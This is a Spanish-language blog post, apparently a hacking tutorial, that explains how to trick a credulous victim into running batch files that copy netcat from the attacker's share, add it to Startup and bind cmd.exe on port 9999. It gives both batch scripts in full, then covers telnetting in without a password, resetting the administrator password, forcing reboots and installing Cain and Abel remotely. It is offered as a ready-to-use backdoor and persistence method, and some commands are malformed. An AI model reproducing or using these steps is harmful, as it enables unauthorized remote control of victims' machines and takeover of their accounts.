Saludos Mundo Libre.
para la entrega numero 100 he decidido preparar halgo exelente asi que disfrutenla.
todo lo que necesita es un objetivo muy crédulos.
Como todos sabemos, un troyano es muy probable que sea recogido por AV, lo que necesita es Netcat, netcat se abre un puerto en un equipo de acceso (Si se utiliza correctamente por un lote de archivo que abra un puerto en un equipo de destino). Usted tendrá que escribir un archivo por lotes. El archivo por lotes para copiar netcat en el equipo remoto tendrá que ser ejecutado desde el equipo de destino (La persona en el blanco tendrá que ejecutar el archivo por lotes, de alguna manera). Abra el Bloc de notas y escriba esto en
@echo off
cd\
xcopy \\yourIP\shared folder\netcat.exe
copy \\yourIP\shared folder\netcat.exe (just to be sure)
cd "Documents and Settings"
cd "All Users"
cd "Start Menu"
cd Programs
cd Startup
xcopy \\yourIP\shared folder\Startup.bat (This is another batch file you will write)
cd\
netcat.exe -L -p 9999 -d -e cmd.exe
Guarde el archivo como un archivo por lotes usando el Bloc de notas.
El archivo por lotes siguiente se utiliza para hacer que el puerto que ha especificado abre todas las ventanas de tiempo se inicia, se puede especificar cualquier puerto que desee. Abra el Bloc de notas y escriba:
@echo off
cd\
netcat.exe -L -p 9999 -d -e cmd.exe
Guarde el archivo como un archivo por lotes usando el Bloc de notas, este será el archivo que se copia en la carpeta de inicio en el archivo por lotes anterior se escribió. Puede enlazar el archivo por lotes a otro archivo y compartir ese archivo, que el objetivo de ejecutar ese archivo para que pueda copiar netcat y el archivo de proceso por lotes en su / ordenador de ella por lo tanto abrir el puerto 9999, después de que el puerto 9999 se ha abierto, a continuación, puede utilizar telnet y telnet a ese puerto en el equipo de destino para tener acceso completo sin necesidad de contraseñas de cualquier tipo. Después de que se cambia la contraseña de administrador ya que si algo le sucede a sus archivos, el comando es la siguiente:
net user administrador newPassword
Ahora, desde aquí se puede hacer lo que quieras, por ejemplo, tratar de apagar el equipo de destino de la navegación a su carpeta system32 y luego escriba:
shutdown-r-t 10-c "Hola"
el equipo se reiniciará en 10 segundos. Usted puede incluso jugar un poco más por la instalación de Caín y Abel en el equipo y después instalar Abel de forma remota en su computadora (Como usted sabe la contraseña de administrador) Una vez que haya Abel en el destino que puede iniciar y detener los servicios y hacer más!
SpOonWiZaRd.
Saludos Mundo Libre.
No hay comentarios:
Publicar un comentario